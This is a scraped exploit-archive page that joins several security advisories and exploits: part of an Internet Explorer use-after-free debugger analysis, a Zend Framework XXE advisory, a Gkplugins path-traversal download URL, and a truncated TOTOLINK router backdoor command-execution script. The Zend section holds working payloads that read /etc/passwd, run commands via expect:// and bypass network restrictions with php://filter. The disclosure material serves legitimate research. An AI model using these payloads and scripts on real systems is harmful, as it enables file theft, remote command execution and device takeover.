IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000464 7108d0d8 IEFRAME!LCIETab_ThreadProc+0x0000037b 71c7d81c iertutil!_IsoThreadProc_WrapperToReleaseScope+0x0000001c 70ef3991 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x00000094 755f7c04 KERNEL32!BaseThreadInitThunk+0x00000024 7787ad1f ntdll!__RtlUserThreadStart+0x0000002f 7787acea ntdll!_RtlUserThreadStart+0x0000001b 0:005> db edi+10 12696fc8 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 12696fd8 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 12696fe8 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 12696ff8 00 00 00 00 00 00 00 00-?? ?? ?? ?? ?? ?? ?? ?? ........???????? 12697008 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 12697018 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 12697028 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 12697038 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? This looks like a use-after-free on memory which was previously freed by the ProtectedFree implementation (and zeroed-out) and thus the memory is not yet marked as free by the heap manager. To verify this assumption, we first disable the Memory Protect feature to see if it's really accessing freed memory: C:\>reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MEMPROTECT_MODE" HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main\Feature Control\FEATURE_MEMPROTECT_MODE iexplore.exe REG_DWORD 0x0 If we trigger the crash again, we notice that this time freed memory is accessed and the memory was indeed previously allocated by the ProtectedFree function. (12c.4a4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=0e958fa0 ecx=0000ffff edx=00000100 esi=00000000 edi=0e982fb8 eip=70595a31 esp=0b3cbda0 ebp=0b3cbdc0 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 MSHTML!CTreeNode::GetCascadedLang+0x65: 70595a31 8b4710 mov eax,dword ptr [edi+10h] ds:002b:0e982fc8=???????? 0:006> !heap -p -a edi+10 address 0e982fc8 found in _DPH_HEAP_ROOT @ aa31000 in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize) aa34f70: e982000 2000 72909712 verifier!AVrfDebugPageHeapFree+0x000000c2 77906061 ntdll!RtlDebugFreeHeap+0x0000003c 778a69ea ntdll!RtlpFreeHeap+0x00044b2f 77861eaa ntdll!RtlFreeHeap+0x000001b6 6feacbbd MSHTML!MemoryProtection::CMemoryProtector::ProtectedFree+0x00000122 701a8a95 MSHTML!CLabelElement::`vector deleting destructor'+0x00000025 6fef7001 MSHTML!CBase::SubRelease+0x00000045 6ff14ee2 MSHTML!CElement::PrivateExitTree+0x00000060 6ff15c8a MSHTML!CMarkup::DestroySplayTree+0x000003ab 6ff16b26 MSHTML!CMarkup::UnloadContents+0x00000d33 70198f3c MSHTML!CMarkup::TearDownMarkupHelper+0x000000a7 70198e63 MSHTML!CMarkup::TearDownMarkup+0x00000058 7018af24 MSHTML!COmWindowProxy::SwitchMarkup+0x000004f3 70876d6a MSHTML!COmWindowProxy::ExecRefresh+0x00000a1d 70876ee3 MSHTML!COmWindowProxy::ExecRefreshCallback+0x00000023 6feed865 MSHTML!GlobalWndOnMethodCall+0x0000016d 6feed18a MSHTML!GlobalWndProc+0x000002e5 75a68e71 user32!_InternalCallWinProc+0x0000002b 75a690d1 user32!UserCallWinProcCheckWow+0x0000018e 75a6a66f user32!DispatchMessageWorker+0x00000208 75a6a6e0 user32!DispatchMessageW+0x00000010 71a700d8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000464 71a9d0d8 IEFRAME!LCIETab_ThreadProc+0x0000037b 7271d81c iertutil!_IsoThreadProc_WrapperToReleaseScope+0x0000001c 716f3991 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x00000094 755f7c04 KERNEL32!BaseThreadInitThunk+0x00000024 7787ad1f ntdll!__RtlUserThreadStart+0x0000002f 7787acea ntdll!_RtlUserThreadStart+0x0000001b 0:006> kb ChildEBP RetAddr Args to Child 0b3cbdc0 7059559d 1330afc8 0b3cc1ec 00000001 MSHTML!CTreeNode::GetCascadedLang+0x65 0b3cbe78 700173bf 0ab19fa0 0e615fa0 00000003 MSHTML!CStyleSheetArray::BuildListOfProbableRules+0x2d5 0b3cbf3c 6fff6d3c 0b3cc1ec 00000001 00000003 MSHTML!CStyleSheetArray::BuildListOfMatchedRules+0x57 0b3cc190 70284613 0b3cc1ec 00000003 00000400 MSHTML!CMarkup::ApplyStyleSheets+0xca 0b3cc1c4 701a742e 0b3cc1ec 00000000 0aa41bb8 MSHTML!CElement::ApplyBehaviorCss+0x9e 0b3cc46c 700adfe3 00000004 07450000 0aa41bb8 MSHTML!CElement::ProcessPeerTask+0xc1f 0b3cc488 700adf3c 00000000 1375dfe8 0aa41bb8 MSHTML!CMarkup::ProcessPeerTaskContext+0x8e 0b3cc4a0 700d3070 0aa41bb8 00000000 00000000 MSHTML!CMarkup::ProcessPeerTasks+0x3f 0b3cc550 6ff17539 00000001 00000000 0b3cc57c MSHTML!CMarkup::UnloadContents+0x1017 0b3cc574 6fef705c 0f4febb8 00000001 6feeccb0 MSHTML!CMarkup::Passivate+0x89 0b3cc58c 6feecccc 0f4febb8 0f4febb8 00000001 MSHTML!CBase::PrivateRelease+0xbc 0b3cc5a8 6ff040f6 0f4febb8 0b3cc5d0 6feecf70 MSHTML!CMarkup::Release+0x18 0b3cc5c4 703edeb0 0f318f18 0e97cf90 00000000 MSHTML!CTxtSite::Release+0xc2 0b3cc5d8 703ede77 00000000 0e97cf90 00000000 MSHTML!CImplPtrAry::ReleaseAndDelete+0x2e 0b3cc5ec 70481a67 00000000 0b3cc624 0e97cf90 MSHTML!CFormElement::DetachExtraFormInputSiteByIndex+0x22 0b3cc5fc 701b66e3 0e97cf90 0b3cc618 0b3cc680 MSHTML!CFormElement::DetachAllExtraFormInputSites+0x13 0b3cc60c 6ff15be3 0b3cc624 0b3cc690 7019abb0 MSHTML!CFormElement::Notify+0x76 0b3cc680 6ff16b26 00000001 00000001 0f2ace30 MSHTML!CMarkup::DestroySplayTree+0x2dd 0b3cc730 70198f3c 00000000 00000001 0c9d4bd0 MSHTML!CMarkup::UnloadContents+0xd33 0b3cc748 70198e63 00000001 00000001 0f33cbb8 MSHTML!CMarkup::TearDownMarkupHelper+0xa7 0b3cc770 7018af24 00000001 00000001 0b3cc838 MSHTML!CMarkup::TearDownMarkup+0x58 0b3cc818 70876d6a 0f33cbb8 00000000 00000000 MSHTML!COmWindowProxy::SwitchMarkup+0x4f3 0b3cc8fc 70876ee3 00005004 ffffffff 00000000 MSHTML!COmWindowProxy::ExecRefresh+0xa1d 0b3cc910 6feed865 0aeb9f68 00005004 0ba04cc8 MSHTML!COmWindowProxy::ExecRefreshCallback+0x23 0b3cc95c 6feed18a 3e26b724 6feec290 00008002 MSHTML!GlobalWndOnMethodCall+0x16d 0b3cc9ac 75a68e71 000103d0 00008002 00000000 MSHTML!GlobalWndProc+0x2e5 0b3cc9d8 75a690d1 6feec290 000103d0 00008002 user32!_InternalCallWinProc+0x2b 0b3cca6c 75a6a66f 6feec290 00000000 00008002 user32!UserCallWinProcCheckWow+0x18e 0b3ccad8 75a6a6e0 30748176 0b3cfcb0 71a700d8 user32!DispatchMessageWorker+0x208 0b3ccae4 71a700d8 0b3ccb24 11ce0e48 1161cfe0 user32!DispatchMessageW+0x10 0b3cfcb0 71a9d0d8 0b3cfd7c 71a9cd50 11cdeff0 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464 0b3cfd70 7271d81c 11ce0e48 0b3cfd94 71b05f70 IEFRAME!LCIETab_ThreadProc+0x37b 0b3cfd88 716f3991 11cdeff0 716f3900 716f3900 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1c 0b3cfdc0 755f7c04 0e502fe8 755f7be0 3b839130 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94 0b3cfdd4 7787ad1f 0e502fe8 3972bde9 00000000 KERNEL32!BaseThreadInitThunk+0x24 0b3cfe1c 7787acea ffffffff 7786022b 00000000 ntdll!__RtlUserThreadStart+0x2f 0b3cfe2c 00000000 716f3900 0e502fe8 00000000 ntdll!_RtlUserThreadStart+0x1b If we check the accessed memory location just before the JavaScript method location.reload() is called, we can see where the memory for the CLabelElement object was allocated. 0:020> !heap -p -a 0e982fc8 address 0e982fc8 found in _DPH_HEAP_ROOT @ aa31000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) aa34f70: e982fb8 48 - e982000 2000 MSHTML!CLabelElement::`vftable' 729094ec verifier!AVrfDebugPageHeapAllocate+0x0000023c 779057b7 ntdll!RtlDebugAllocateHeap+0x0000003c 778a77ce ntdll!RtlpAllocateHeap+0x0004665a 77861134 ntdll!RtlAllocateHeap+0x0000014d 70121dd5 MSHTML!CLabelElement::CreateElement+0x00000015 6ff95b4d MSHTML!CreateElement+0x00000084 70104768 MSHTML!CInBodyInsertionMode::DefaultStartElementHandler+0x00000078 7000d6eb MSHTML!CInsertionMode::HandleStartElementToken+0x0000003d 7000d3a3 MSHTML!CHtml5TreeConstructor::HandleElementTokenInInsertionMode+0x00000026 7000d338 MSHTML!CHtml5TreeConstructor::PushElementToken+0x000000a5 7000d1cc MSHTML!CHtml5Tokenizer::TagName_StateHandler+0x0000028c 7000ab35 MSHTML!CHtml5Tokenizer::ParseBuffer+0x0000012c 7000ae09 MSHTML!CHtml5Parse::ParseToken+0x00000131 7000a377 MSHTML!CHtmPost::ProcessTokens+0x000006af 70004952 MSHTML!CHtmPost::Exec+0x000001e4 70081118 MSHTML!CHtmPost::Run+0x0000003d 7008107e MSHTML!PostManExecute+0x00000061 700894a2 MSHTML!PostManResume+0x0000007b 700a04f7 MSHTML!CDwnChan::OnMethodCall+0x0000003e 6feed865 MSHTML!GlobalWndOnMethodCall+0x0000016d 6feed18a MSHTML!GlobalWndProc+0x000002e5 75a68e71 user32!_InternalCallWinProc+0x0000002b 75a690d1 user32!UserCallWinProcCheckWow+0x0000018e 75a6a66f user32!DispatchMessageWorker+0x00000208 75a6a6e0 user32!DispatchMessageW+0x00000010 71a700d8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000464 71a9d0d8 IEFRAME!LCIETab_ThreadProc+0x0000037b 7271d81c iertutil!_IsoThreadProc_WrapperToReleaseScope+0x0000001c 716f3991 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x00000094 755f7c04 KERNEL32!BaseThreadInitThunk+0x00000024 7787ad1f ntdll!__RtlUserThreadStart+0x0000002f 7787acea ntdll!_RtlUserThreadStart+0x0000001b ________________________________________________________________________________ III. Mitigation The issue was fixed in MS15-079 which should be installed to resolve the issue. ________________________________________________________________________________ IV. Disclosure Timeline - 2015-05-11 Vulnerability reported to secure@microsoft.com - 2015-05-11 Acknowledgement of received report - 2015-05-14 Microsoft confirms that they successfully reproduced the issue - 2015-06-03 Requested a status update - 2015-06-03 Microsoft confirms that they are currently working on a fix and they want to know if hitting the August patch day would be acceptable, because that would be 2 days after the 90 day disclosure timeline - 2015-07-14 Requested a status upate - 2015-07-15 Microsoft confirms to be on track for the August patch day - 2015-08-10 Requested another status update - 2015-08-11 Microsoft resolves issue in MS15-079 ________________________________________________________________________________ Credit: Bug found by Moritz Jodeit of Blue Frost Security GmbH. ________________________________________________________________________________ Unaltered electronic reproduction of this advisory is permitted. For all other reproduction or publication, in printing or otherwise, contact research@bluefrostsecurity.de for permission. Use of the advisory constitutes acceptance for use in an "as is" condition. All warranties are excluded. In no event shall Blue Frost Security be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Blue Frost Security has been advised of the possibility of such damages. Copyright 2015 Blue Frost Security GmbH. All rights reserved. Terms of use apply. -->
HireHackking

Zend Framework 2.4.2 - PHP FPM XML eXternal Entity Injection

HACKER · %s · %s

============================================= - Release date: 12.08.2015 - Discovered by: Dawid Golunski - Severity: High - CVE-ID: CVE-2015-5161 ============================================= I. VULNERABILITY ------------------------- Zend Framework <= 2.4.2 XML eXternal Entity Injection (XXE) on PHP FPM Zend Framework <= 1.12.13 II. BACKGROUND ------------------------- - Zend Framework From http://framework.zend.com/about/ website: "Zend Framework 2 is an open source framework for developing web applications and services using PHP 5.3+. Zend Framework 2 uses 100% object-oriented code and utilises most of the new features of PHP 5.3, namely namespaces, late static binding, lambda functions and closures. Zend Framework 2 evolved from Zend Framework 1, a successful PHP framework with over 15 million downloads." - PHP FPM http://php.net/manual/en/install.fpm.php "FPM (FastCGI Process Manager) is an alternative PHP FastCGI implementation with some additional features (mostly) useful for heavy-loaded sites." Starting from release 5.3.3 in early 2010, PHP merged the php-fpm fastCGI process manager into its codebase. However PHP-FPM was available earlier as a separate project (http://php-fpm.org/). III. INTRODUCTION ------------------------- The XML standard defines a concept of external entites. XXE (XML eXternal Entity) attack is an attack on an application that parses XML input from untrusted sources using incorrectly configured XML parser. The application may be forced to open arbitrary files and/or network resources. Exploiting XXE issues on PHP applications may also lead to denial of service or in some cases (for example, when an 'expect' PHP module is installed) lead to command execution. An independent security reserach of Zend Framework revealed that it is possible to bypass XXE security controls within the framework in case the PHP application using Zend XML related classes (e.g Zend_XmlRpc_Server, Zend_Feed, Zend_Config_Xml etc.) from Zend Framework is served via PHP FPM. Bypassing the controls may allow XXE attacks and lead to the aforementioned exploitation possibilities on systems where the XML parser is set to resolve entities. IV. DESCRIPTION ------------------------- The security controls within the Zend Framework mitigate the XXE attack vectors by first calling libxml_disable_entity_loader(), and then looping through the DOMDocument nodes testing if any is of type: XML_DOCUMENT_TYPE_NODE If so, an exception is raised and PHP script execution is halted. These controls have been included in the scan() function of a Zend_Xml_Security class located in the following paths depending on the code branch of Zend Framework: ZendFramework-1.12.13/library/Zend/Xml/Security.php ZendFramework-2.4.2/library/ZendXml/Security.php In case of the latest version of ZendFramework-1.12.13, the relevant code blocks from the scan() function look as follows: ---[library/Zend/Xml/Security.php ]--- public static function scan($xml, DOMDocument $dom = null) { if (self::isPhpFpm()) { self::heuristicScan($xml); } if (!self::isPhpFpm()) { $loadEntities = libxml_disable_entity_loader(true); $useInternalXmlErrors = libxml_use_internal_errors(true); } // Load XML with network access disabled (LIBXML_NONET) $result = $dom->loadXml($xml, LIBXML_NONET); restore_error_handler(); if (!self::isPhpFpm()) { libxml_disable_entity_loader($loadEntities); libxml_use_internal_errors($useInternalXmlErrors); } if (!$result) { return false; } // Scan for potential XEE attacks using ENTITY, if not PHP-FPM if (!self::isPhpFpm()) { foreach ($dom->childNodes as $child) { if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) { if ($child->entities->length > 0) { require_once 'Exception.php'; throw new Zend_Xml_Exception(self::ENTITY_DETECT); } } } } if (isset($simpleXml)) { $result = simplexml_import_dom($dom); if (!$result instanceof SimpleXMLElement) { return false; } return $result; } return $dom; -------------------------------------- As we can see from the code, the application disables the entity loader (via libxml_disable_entity_loader), it also disables network access (LIBXML_NONET), and it additionally scans provided XML for the presence of XML entities to prevent potential entity expansion attacks. The code succesfully prevents most XXE attacks. However, as the PHP libxml_disable_entity_loader() function was reported not thread safe (the entity loader setting could potentially get overwritten between hits in FPM processes), Zend Framework does not use it when the application is hosted in a PHP-FPM environment. Instead, another approach is taken to prevent the XXE attacks. In the code above we see the check !self::isPhpFpm() which determines the type of interface between web server and PHP (through the php_sapi_name() function). If the SAPI is FPM-CGI (i.e. PHP-FPM) the following heuristicScan function gets executed: ---[library/Zend/Xml/Security.php ]--- protected static function heuristicScan($xml) { if (strpos($xml, '<!ENTITY') !== false) { require_once 'Exception.php'; throw new Zend_Xml_Exception(self::ENTITY_DETECT); } } -------------------------------------- It validates provided XML by searching for any entity declaration. It throws an exception if it finds one. Although this check cannot be bypassed by simply adding spaces or changing the characters to lower case (an XML parser would reject such declaration as invalid), this security check is nevertheless insufficient. XML format allows for different types of encoding to be used, hence it is possible to bypass the check by supplying specifically encoded XML content. For example, a UTF-16 encoding which uses 2-byte characters would be enough to bypass the ENTITY string check. Apart from the ENTITY check, the code also adds the aformentioned LIBXML_NONET parameter to catch entities refering to network resources. This limitation can also be bypassed as shown in the proof of concept exploit. This makes the Zend Framework vulnerable to XXE injection attacks. V. PROOF OF CONCEPT ------------------------- Below is a simple PHP application using Zend Framework to implement an XML-RPC server for demonstation: ---[ zend_xmlrpc_server.php ]-- <?php // Simple XML-RPC SERVER function helloworld() { $text = "Hello world! This request was executed via ".php_sapi_name()."."; return $text; } set_include_path("./ZendFramework-1.12.13/library/"); require_once("./ZendFramework-1.12.13/library/Zend/Loader/Autoloader.php"); Zend_Loader_Autoloader::getInstance(); $server = new Zend_XmlRpc_Server(); $server->addFunction('helloworld'); echo $server->handle(); ?> ------------------------------- This test application is hosted on an Apache server with PHP-FPM. Requesting: POST /zend_poc/zend-xmlrpc-server.php HTTP/1.1 Host: apache-php-fpm <?xml version="1.0" encoding="UTF-8"?> <methodCall> <methodName>helloworld</methodName> </methodCall> should return: <methodResponse><params><param><value><string>Hello world! This request was executed via fpm-fcgi.</string></value></param></params> </methodResponse> In order to exploit the XXE vulnerability contained in the Zend framework an attacker can pass XML data containing external entities similar to: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE methodCall [ <!ENTITY pocdata SYSTEM "file:///etc/passwd"> ]> <methodCall> <methodName>retrieved: &pocdata;</methodName> </methodCall> Feeding the above data to the zend-xmlrpc-server.php script will result in an error: <int>631</int></value></member><member><name>faultString</name><value> <string>Failed to parse request</string></value></member></struct></value> </fault></methodResponse> which is due to the heuristicScan ENTITy detection. We can now encode the data to avoid the check. $ cat poc-utf8.xml | sed 's/UTF-8/UTF-16/' \ | iconv -f UTF-8 -t UTF-16 >poc-utf16.xml Hex representation of the UTF-16 encoded XML file (including the change in the xml header to reflect the new encoding) looks as follows: $ hexdump -C poc-utf16.xml 00000000 ff fe 3c 00 3f 00 78 00 6d 00 6c 00 20 00 76 00 |..<.?.x.m.l. .v.| 00000010 65 00 72 00 73 00 69 00 6f 00 6e 00 3d 00 22 00 |e.r.s.i.o.n.=.".| 00000020 31 00 2e 00 30 00 22 00 20 00 65 00 6e 00 63 00 |1...0.". .e.n.c.| 00000030 6f 00 64 00 69 00 6e 00 67 00 3d 00 22 00 55 00 |o.d.i.n.g.=.".U.| 00000040 54 00 46 00 2d 00 38 00 22 00 3f 00 3e 00 0a 00 |T.F.-.8.".?.>...| 00000050 3c 00 21 00 44 00 4f 00 43 00 54 00 59 00 50 00 |<.!.D.O.C.T.Y.P.| 00000060 45 00 20 00 6d 00 65 00 74 00 68 00 6f 00 64 00 |E. .m.e.t.h.o.d.| 00000070 43 00 61 00 6c 00 6c 00 20 00 5b 00 0a 00 20 00 |C.a.l.l. .[... .| 00000080 20 00 3c 00 21 00 45 00 4e 00 54 00 49 00 54 00 | .<.!.E.N.T.I.T.| 00000090 59 00 20 00 70 00 6f 00 63 00 64 00 61 00 74 00 |Y. .p.o.c.d.a.t.| 000000a0 61 00 20 00 53 00 59 00 53 00 54 00 45 00 4d 00 |a. .S.Y.S.T.E.M.| 000000b0 20 00 22 00 66 00 69 00 6c 00 65 00 3a 00 2f 00 | .".f.i.l.e.:./.| 000000c0 2f 00 2f 00 65 00 74 00 63 00 2f 00 70 00 61 00 |/./.e.t.c./.p.a.| 000000d0 73 00 73 00 77 00 64 00 22 00 3e 00 0a 00 5d 00 |s.s.w.d.".>...].| 000000e0 3e 00 0a 00 3c 00 6d 00 65 00 74 00 68 00 6f 00 |>...<.m.e.t.h.o.| 000000f0 64 00 43 00 61 00 6c 00 6c 00 3e 00 0a 00 20 00 |d.C.a.l.l.>... .| 00000100 20 00 3c 00 6d 00 65 00 74 00 68 00 6f 00 64 00 | .<.m.e.t.h.o.d.| 00000110 4e 00 61 00 6d 00 65 00 3e 00 72 00 65 00 74 00 |N.a.m.e.>.r.e.t.| 00000120 72 00 69 00 65 00 76 00 65 00 64 00 3a 00 20 00 |r.i.e.v.e.d.:. .| 00000130 26 00 70 00 6f 00 63 00 64 00 61 00 74 00 61 00 |&.p.o.c.d.a.t.a.| 00000140 3b 00 3c 00 2f 00 6d 00 65 00 74 00 68 00 6f 00 |;.<./.m.e.t.h.o.| 00000150 64 00 4e 00 61 00 6d 00 65 00 3e 00 0a 00 3c 00 |d.N.a.m.e.>...<.| 00000160 2f 00 6d 00 65 00 74 00 68 00 6f 00 64 00 43 00 |/.m.e.t.h.o.d.C.| 00000170 61 00 6c 00 6c 00 3e 00 0a 00 |a.l.l.>...| As can be seen on the hexdump, the ENTITY word is encoded using 2-byte characters. Resupplying the encoded data contained in poc-utf16.xml to the Zend XMLRPC application, depending on the underlying libxml library, may result in a password file retrival from the remote server: $ wget -q -O /dev/stdout http://apache-phpfpm/zend_poc/zend-xmlrpc-server.php \ --post-file=poc-utf16.xml <?xml version="1.0" encoding="UTF-8"?> <methodResponse><fault><value><struct><member><name>faultCode</name><value> <int>620</int></value></member><member><name>faultString</name><value><string> Method "retrieved: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh [cut] " does not exist</string></value></member></struct></value></fault> </methodResponse> If the password file is not returned, an attacker may try another version of an XXE attack using parameter entities and an out-of-band communication. Both of these can be used to exploit the vulnerability in Zend Framework on a greater number of libxml configurations. Remote command execution may also be possible if the remote system has an 'expect' php module (libexpect-php) installed. If this is the case, we can for example execute 'id' command via injecting the entity: <!ENTITY pocdata SYSTEM "expect://id"> which should return a result similar to: <?xml version="1.0" encoding="UTF-8"?> <methodResponse><fault><value><struct><member><name>faultCode</name><value> <int>620</int></value></member><member><name>faultString</name><value> <string>Method "retrieved: uid=33(www-data) gid=33(www-data) groups=33(www-data) " does not exist</string></value></member> A separate POC exploit (zend-xmlrpc-exploit-cmd-exec.sh) is included which runs commands with parameters and also implements parameter entities/OOB communication. As mentioned in the description of this vulnerability, the Zend Framework adds a LIBXML_NONET flag to the loadXML() call in order to prevent reaching network resources through XXE. As a result, requesting a network resource such as http://192.168.57.10 via XXE injection will fail. This can be bypassed by using php://filter wrapper inside an entity, e.g: <!ENTITY pocdata SYSTEM "php://filter/read=convert.base64-encode/ resource=http://192.168.57.10"> This will return a base64 encoded response from the remote server bypassing the LIBXML_NONET restriction: <?xml version="1.0" encoding="UTF-8"?> <methodResponse><fault><value><struct><member><name>faultCode</name><value><int>620</int> </value></member><member><name>faultString</name><value><string>Method " retrieved: PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDMuMiBGaW5hb C8vRU4iPgo8aHRtbD4KIDxoZWFkPgogIDx0aXRsZT5JbmRleCBvZiAvPC90aXRsZT4KIDwvaGVhZ D4KIDxib2R5Pgo8aDE+SW5kZXggb2YgLzwvaDE+CiAgPHRhYmxlPgogICA8dHI+PHRoIHZhbGlnb j0idG9wIj48aW1nIHNyYz0iL2ljb[cut] This vulnerability may also lead to Denial of Service if for example the attacker requests /dev/random file through XXE. This will cause the application to block on the endless input from the random generator pseudo device, until the maximum execution time is reached. Sending multiple requests of such kind would exhaust the maximum number of threads that the web server can create. VI. BUSINESS IMPACT ------------------------- An unauthenticated remote exploitation may be possible on applications which make use of Zend_XmlRpc_Server with a public XML-RPC endpoint as demonstrated in this advisory. Authentication in case of XML-RPC is not required for exploitation as the XML needs to be processed first in order for the application to read the credentials passed from the login data within the xml-formatted input. This issue should be marked as high/critical due to the wide deployment of Zend Framework (which includes some major CMS and e-commerce applications), the number of Zend XML classes affected, low complexity of exploitation, as well as a possibility of an unauthenticated remote exploitation. There is also a growing number of servers set up to serve PHP code with PHP-FPM, especially in web hosting environments which need to respond to heavy load. VII. SYSTEMS AFFECTED ------------------------- All systems making use of Zend Framework in versions starting from 1.12.4 and 2.1.6 up to the latest versions of Zend Framework 1.12.13 (released 2015-05-20) and 2.4.2 (released 2015-05-11) contain the XXE injection vulnerability described in this advisory. All Zend Framework classes making use of XML and calling the vulnerable Zend_Xml_Security::scan() function are affected by this issue: Zend/Amf/Parse/Amf0/Deserializer.php Zend/Amf/Parse/Amf3/Deserializer.php Zend/Config/Xml.php Zend/Dom/Query.php Zend/Feed/Abstract.php Zend/Feed/Entry/Abstract.php Zend/Feed/Entry/Atom.php Zend/Feed.php Zend/Feed/Reader.php Zend/Feed/Writer/Renderer/Entry/Atom.php Zend/Gdata/App/Base.php Zend/Gdata/App.php Zend/Gdata/Gapps/ServiceException.php Zend/Gdata/YouTube.php Zend/Json.php Zend/Mobile/Push/Message/Mpns/Raw.php Zend/Rest/Client/Result.php Zend/Search/Lucene/Document/Docx.php Zend/Search/Lucene/Document/OpenXml.php Zend/Search/Lucene/Document/Pptx.php Zend/Search/Lucene/Document/Xlsx.php Zend/Serializer/Adapter/Wddx.php Zend/Service/Amazon/Ec2/Response.php Zend/Service/Amazon.php Zend/Service/Amazon/SimpleDb/Response.php Zend/Service/Audioscrobbler.php Zend/Service/Delicious.php Zend/Service/Ebay/Finding.php Zend/Service/Flickr.php Zend/Service/SlideShare.php Zend/Service/SqlAzure/Management/Client.php Zend/Service/Technorati.php Zend/Service/WindowsAzure/Diagnostics/ConfigurationInstance.php Zend/Service/WindowsAzure/Management/Client.php Zend/Service/WindowsAzure/Storage.php Zend/Service/Yahoo.php Zend/Soap/Server.php Zend/Soap/Wsdl.php Zend/XmlRpc/Request.php Zend/XmlRpc/Response.php The vulnerability can be exploited in applications using vulnerable version of the framework, where PHP code is served with PHP-FPM, and when the xml parser installed in the system is set up to resolves entities. PHP-FPM can be set up on popular web servers such as Apache, or Nginx on Linux/Unix, as well as Windows systems (as per the 'fpm on cygwin' setup guides available on the Internet). VIII. SOLUTION ------------------------- Install the latest version of Zend Framework containing the patch for this vulnerability. IX. REFERENCES ------------------------- http://legalhackers.com/ http://legalhackers.com/advisories/zend-framework-XXE-vuln.txt http://framework.zend.com/blog/zend-framework-2-5-0-released.html http://framework.zend.com/security/advisory/ZF2015-06 http://www.securiteam.com/ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5161 X. DISCOVERED BY ------------------------- The vulnerability has been discovered by Dawid Golunski dawid (at) legalhackers (dot) com legalhackers.com XI. REVISION HISTORY ------------------------- Aug 12th, 2015: Final version XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.
HireHackking

Gkplugins Picasaweb - Download File

HACKER · %s · %s

# Exploit Title: Gkplugins Picasaweb Download File # Date : 2015-08-13 # Exploit Author : TMT [VNhgroup] # Vendor Homepage: https://gkplugins.com/ # Tested on: Windows 7 File ------------------------ $fileout = $_GET['f']; <-- can you download file $filelength = $_GET['l']; $filestream = $_GET['start']; if($fileout!=""){ $fileout = urldecode($fileout); $filelength = urldecode($filelength); if($filestream!=""){ $filelength -= $filestream; $filestream = "?start=".$filestream; } header('Content-Type: application/octet-stream'); header('Content-Length: ' . $filelength); readfile($fileout.$filestream); }else{ $text = get_curl($link); echo $text; } ------------------------------ Exploit Code: site.com/plugins/gkplugins_picasaweb/plugins/plugins_player.php?f=../../../index.php
HireHackking

TOTOLINK Routers - Backdoor / Remote Code Execution

HACKER · %s · %s

# Exploit Title: TOTOLINK backdoor and RCE exploit POC # Google Dork: N/A # Date: Thu Aug 13 07:33:29 MDT 2015 # Exploit Author: MadMouse # Vendor Homepage: http://www.totolink.net/ # Software Link: http://www.totolink.net/include/download.asp?path=down/010100&file=TOTOLINK%20A850R-V1_1.0.1_20150725.zip # Version: A850R-V1 : until last firwmware TOTOLINK-A850R-V1.0.1-B20150707.1612.web, F1-V2 : until last firmware F1-V2.1.1-B20150708.1646.web, F2-V1 : until last firmware F2-V2.1.0-B20150320.1611.web, N150RT-V2 : until last firmware TOTOLINK-N150RT-V2.1.1-B20150708.1548.web, N151RT-V2 : until last firmware TOTOLINK-N151RT-V2.1.1-B20150708.1559.web, N300RH-V2 : until last firmware TOTOLINK-N300RH-V2.0.1-B20150708.1625.web, N300RH-V3 : until last firmware TOTOLINK-N300RH-V3.0.0-B20150331.0858.web, N300RT-V2 : until last firmware TOTOLINK-N300RT-V2.1.1-B20150708.1613.web # Tested on: A850R-V1 # CVE : N/A # Credit: https://pierrekim.github.io/advisories/2015-totolink-0x02.txt #!/usr/bin/env python # ------------------------------------------------------------------------------ # THE SCOTCH-WARE LICENSE (Revision 43): # <aaronryool@gmail.com> wrote this file. As long as you retain this notice you # can do whatever you want with this stuff. If we meet some day, and you think # this stuff is worth it, you can buy me a shot of scotch in return # ------------------------------------------------------------------------------ import socket, sys if len(sys.argv) < 2: print("Usage: %s <ip> <command string>...\x1b[0m" % sys.argv[0]) exit(1) commandstr = urllib.quote_plus(" ".join(sys.argv[2:])) def check_activate_backdoor(): try: vulnerable = "hel,xasf" # this is both the check, and the command to open the management interface to the internet s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1], 5555)) s.send(vulnerable) ret = True if s.recv(len(vulnerable)) == vulnerable else False s.close() except: print("\x1b[031mThis just happened: \x1b[037m%s\x1b[0m" % sys.exc_info()[0]) exit(2) return ret def close_backdoor(): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 